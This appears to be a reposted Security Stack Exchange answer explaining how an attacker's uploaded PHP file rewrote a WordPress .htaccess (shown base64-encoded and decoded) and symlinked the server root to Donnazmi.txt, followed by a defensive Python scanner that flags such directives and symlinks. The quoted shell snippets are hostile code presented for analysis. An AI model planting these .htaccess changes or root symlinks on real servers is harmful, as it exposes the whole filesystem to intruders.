How did the hacker get access to my WordPress upload folder?

Author: Dương Nguyễn Phú Cường
Posted: 4 years ago


https://security.stackexchange.com/questions/96000/how-did-the-hacker-get-access-to-my-wordpress-upload-folder
Once the file is uploaded to the server (exploiting a bug in a WordPress theme), the .htaccess is reconfigured in a way that any .txt file will be interpreted by the server as a .php script and it will follow symlinks. The next step is the trick: he makes a symlink from / to Donnazmi.txt (2 ways). The code isn't really complex; it prints an HTML form with the needed configs to run the exploit steps (you need to send a POST request with Donnazmi as a post key to see it). Code explained: .htaccess reconfig:
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
This is a base64 encoded string, which translates into:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
So with that config:
$file = fopen(".htaccess", "w+"); // open the file
$write = fwrite($file, base64_decode($fvckem)); // write the new config inside the file
Symlinks:
// 1. this is a link made with the Linux command `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link made with the PHP native function
$Donnazmi = symlink("/", "Donnazmi.txt");
After the execution, each time he visits example.com/Donnazmi.txt he sees a list of the root directory of your server (Options Indexes tm). So yes, rebuild that machine, and check the software before installing it.
The video that I found was the first thing to come up when I googled the hacker's name. Do you have the WordPress Cold Fusion theme installed by any chance? Here is the so-called Mauritania Attacker's video explaining how he exploits the specific WordPress theme to upload files to the server.
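As an added defensive example (not part of the answer above), the following Python scanner walks a WordPress uploads directory and flags the two artifacts the answer describes: an .htaccess carrying Options Indexes/FollowSymLinks or AddType/AddHandler lines that route php, and symlinks whose target resolves outside the document root. The demo() function builds a constructed sample site in a temporary directory using the decoded directives from the answer and a Donnazmi.txt link to /; the paths and the directory layout are assumptions, not taken from a real server.

```python
import os
import re
import tempfile
from pathlib import Path

# Directives an uploads directory should never carry; they cover the decoded
# .htaccess shown above (Options Indexes FollowSymLinks, AddType/AddHandler with php).
SUSPECT_DIRECTIVES = [
    ("php-handler", re.compile(r"^\s*(?:Add(?:Type|Handler)|SetHandler)\b.*php", re.I)),
    ("symlinks-or-indexes", re.compile(r"^\s*Options\b.*\b(?:FollowSymLinks|Indexes)\b", re.I)),
]

def scan_htaccess_text(text):
    """Return (label, line) pairs for every suspect directive in .htaccess text."""
    hits = []
    for line in text.splitlines():
        for label, pattern in SUSPECT_DIRECTIVES:
            if pattern.search(line):
                hits.append((label, line.strip()))
    return hits

def scan_uploads(uploads_dir, docroot):
    """Walk the uploads tree without following links; flag tampered .htaccess
    files and symlinks whose target resolves outside the document root."""
    docroot = Path(docroot).resolve()
    findings = []
    for root, dirs, files in os.walk(uploads_dir):
        for name in dirs + files:
            p = Path(root) / name
            if p.is_symlink():
                target = p.resolve()  # final target, e.g. "/" for Donnazmi.txt
                if target != docroot and docroot not in target.parents:
                    findings.append(("symlink-escape", str(p), str(target)))
            elif name == ".htaccess":
                for label, line in scan_htaccess_text(p.read_text(errors="replace")):
                    findings.append((label, str(p), line))
    return findings

def demo():
    """Constructed sample (assumed layout, not a real site): a webroot whose
    uploads/.htaccess holds the decoded directives above plus a link to /."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = Path(tmp) / "www"
        uploads = docroot / "wp-content" / "uploads"
        uploads.mkdir(parents=True)
        (uploads / ".htaccess").write_text("Options Indexes FollowSymLinks\n"
            "DirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php\n")
        os.symlink("/", uploads / "Donnazmi.txt")
        return scan_uploads(uploads, docroot)
```

Calling demo() returns four findings: two php-handler lines, one symlinks-or-indexes line and one symlink-escape entry for Donnazmi.txt; point scan_uploads() at a real wp-content/uploads and its document root to check a live site.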